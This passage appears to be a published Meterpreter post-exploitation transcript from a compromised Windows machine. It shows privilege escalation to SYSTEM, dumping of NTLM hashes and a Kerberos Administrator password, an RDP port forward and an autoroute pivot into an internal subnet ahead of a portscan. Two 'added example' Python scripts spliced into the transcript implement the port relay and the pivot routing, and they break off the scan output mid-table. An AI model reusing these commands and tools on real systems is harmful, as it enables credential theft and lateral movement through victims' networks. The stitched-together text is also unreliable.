Published 2024-05-26 (author: )
3380 376 x86 0 xxxxxxxxxxxx\Administrator C:
meterpreter > migrate 2128
Migrating from 3104
Migration completed successfully.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > msv
[+] Running as SYSTEM
Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;109205 NTLM xxxxxxxxxxxx Administrator lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;54469 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP xxxxxxxxxxxx$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;54469 NTLM
0;999 NTLM WORKGROUP xxxxxxxxxxxx$
0;109205 NTLM xxxxxxxxxxxx Administrator 123456
meterpreter > portfwd add -l 3389 -r <IP redacted> -p 3389 # IP redacted
Local TCP relay created: :3389 <-> :3389
meterpreter > portfwd
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:3389 :3389 Forward
1 total active port forwards.
root@xxxx:/# rdesktop 127.0.0.1:3389
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
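The `portfwd add -l 3389 -r <host> -p 3389` step above is nothing more than a TCP relay on the attacker box: rdesktop talks to 127.0.0.1:3389 and the Meterpreter session carries the bytes to the internal host. The script below is an added example (not Metasploit's code) of that mechanism in plain Python sockets; the echo server is a constructed stand-in for the RDP host so it runs offline, and the names PortForwarder, start_echo_server and relay_roundtrip are hypothetical. One deliberate difference from the transcript: the relay binds 127.0.0.1 by default, whereas the `portfwd` listing shows 0.0.0.0:3389, which hands the pivot to anyone who can reach the attacker host.

```python
"""Local TCP relay, the mechanism behind `portfwd add -l <lport> -r <rhost> -p <rport>`.
Added example, not Metasploit's code; all names are hypothetical."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    far end sees the EOF too (protocols that finish with a close rely on it)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(client: socket.socket, upstream: socket.socket) -> None:
    """Run both directions, then release both sockets."""
    threads = [
        threading.Thread(target=_pump, args=(client, upstream), daemon=True),
        threading.Thread(target=_pump, args=(upstream, client), daemon=True),
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    upstream.close()


class PortForwarder:
    """lhost:lport <-> rhost:rport relay.  Defaults to loopback, unlike the
    transcript's 0.0.0.0:3389 listener, so only local tools reach the pivot."""

    def __init__(self, rhost: str, rport: int, lhost: str = "127.0.0.1", lport: int = 0):
        self.remote = (rhost, rport)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((lhost, lport))  # lport=0 lets the OS pick a free port
        self.listener.listen(8)
        self.lhost, self.lport = self.listener.getsockname()[:2]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return  # listener closed by close()
            try:
                upstream = socket.create_connection(self.remote, timeout=5)
                upstream.settimeout(None)  # connect timeout only; idle RDP must not be cut
            except OSError:
                client.close()  # target unreachable: drop this client, keep serving
                continue
            threading.Thread(target=_bridge, args=(client, upstream), daemon=True).start()

    def close(self) -> None:
        self.listener.close()


def start_echo_server(host: str = "127.0.0.1") -> int:
    """Constructed target standing in for the internal RDP host: echoes one
    connection back, then exits.  Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)

    def serve() -> None:
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_roundtrip(payload: bytes) -> bytes:
    """Push payload through a fresh relay to the echo target; return what comes back."""
    fwd = PortForwarder("127.0.0.1", start_echo_server())
    try:
        with socket.create_connection((fwd.lhost, fwd.lport), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # we are done sending; wait for the echo and EOF
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        fwd.close()


if __name__ == "__main__":
    # An RDP client would connect to 127.0.0.1:<lport> here; a byte string stands in for it.
    print(relay_roundtrip(b"\x03\x00\x00\x0b\x06\xe0\x00\x00\x00\x00\x00"))
```

Because the relay half-closes each side when the other reaches EOF, a client that shuts down its write side still receives everything the target sends afterwards, which is what makes the echo round trip (and a real RDP disconnect) terminate cleanly.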
meterpreter > run autoroute -h
Usage: run autoroute [-r] -s subnet -n netmask
Examples:
run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
run autoroute -p # Print active routing table
run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
Hardware MAC : 00:11:25:40:77:8f
MTU : 1500
IPv4 Address : 10.23.255.3
IPv4 Netmask : 255.255.255.0
meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0
Adding a route to 10.23.255.3/255.255.255.0...
[+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227
Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.23.255.3 255.255.255.0 Session 3
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
Hardware MAC : 00:11:25:40:77:8f
MTU : 1500
IPv4 Address : 10.23.255.3
IPv4 Netmask : 255.255.255.0
meterpreter >
Background session 3? [y/N]
msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
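The `autoroute` step above makes the portscan that follows possible: any module whose RHOSTS falls inside a routed subnet is sent through the session that owns the route. The following Python script is an added example (not Metasploit's code) of that bookkeeping. It parses the `ifconfig` output printed earlier (copied in as sample input), derives the `run autoroute` command for the interface's network, and resolves a target address to a session with a masked, longest-prefix match. It is assumed here, not shown on the page, that Metasploit's routing table masks host bits the same way; what the transcript does show is that passing the host address `-s 10.23.255.3` leaves a host address in the printed routing table, which the example avoids by emitting the network address. The names parse_ifconfig, autoroute_command, Route and SwitchBoard are hypothetical.

```python
"""Pivot routing as done by `run autoroute -s <subnet> -n <netmask>` and the
Meterpreter routing table.  Added example, not Metasploit's own code; names are hypothetical."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Sample input: the `ifconfig` output printed by the session in the transcript.
SAMPLE_IFCONFIG = """\
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
Hardware MAC : 00:11:25:40:77:8f
MTU : 1500
IPv4 Address : 10.23.255.3
IPv4 Netmask : 255.255.255.0
"""


def parse_ifconfig(text: str) -> List[Tuple[str, ipaddress.IPv4Interface]]:
    """Return (interface name, address/netmask) for every interface that reports
    both an IPv4 address and a netmask.  The loopback entry above has no netmask
    line, so it is skipped instead of becoming a bogus route."""
    blocks, cur = [], {}
    for line in text.splitlines():
        if line.startswith("Interface "):
            if cur:
                blocks.append(cur)
            cur = {}
        elif ":" in line:  # "Key : value"; MAC addresses keep their later colons
            key, _, value = line.partition(":")
            cur[key.strip()] = value.strip()
    if cur:
        blocks.append(cur)
    return [
        (b["Name"], ipaddress.IPv4Interface(f'{b["IPv4 Address"]}/{b["IPv4 Netmask"]}'))
        for b in blocks
        if "IPv4 Address" in b and "IPv4 Netmask" in b
    ]


def autoroute_command(iface: ipaddress.IPv4Interface) -> str:
    """Command for the interface's *network*.  The transcript passed the host
    address (-s 10.23.255.3); the masked match below still covers the whole /24,
    but the printed routing table then shows a host address and is harder to
    audit, so emit the network address instead."""
    net = iface.network
    return f"run autoroute -s {net.network_address} -n {net.netmask}"


@dataclass(frozen=True)
class Route:
    subnet: ipaddress.IPv4Network
    session: int


class SwitchBoard:
    """Routing table mapping subnets to Meterpreter sessions (hypothetical
    stand-in; assumed to mask host bits and prefer the longest prefix)."""

    def __init__(self) -> None:
        self.routes: List[Route] = []

    def add_route(self, subnet: str, netmask: str, session: int) -> Route:
        # strict=False clears host bits: "10.23.255.3"/"255.255.255.0" is stored as 10.23.255.0/24
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        route = Route(net, session)
        self.routes.append(route)
        return route

    def best_session(self, addr: str) -> Optional[int]:
        """Session to pivot through for addr, or None when no route covers it
        (the module then talks to the address directly from the attacker host)."""
        ip = ipaddress.IPv4Address(addr)
        best: Optional[Route] = None
        for r in self.routes:
            if ip in r.subnet and (best is None or r.subnet.prefixlen > best.subnet.prefixlen):
                best = r
        return best.session if best else None


if __name__ == "__main__":
    sb = SwitchBoard()
    for name, iface in parse_ifconfig(SAMPLE_IFCONFIG):
        print(name, "->", autoroute_command(iface))
        sb.add_route(str(iface.ip), str(iface.netmask), session=3)
    print("10.23.255.200 via session", sb.best_session("10.23.255.200"))
    print("61.57.243.227 via session", sb.best_session("61.57.243.227"))
```

Before running `auxiliary/scanner/portscan/tcp` against an internal range, the practical check is exactly `best_session` for the RHOSTS you intend to scan: an address that resolves to no session is scanned from the attacker host, not through the pivot.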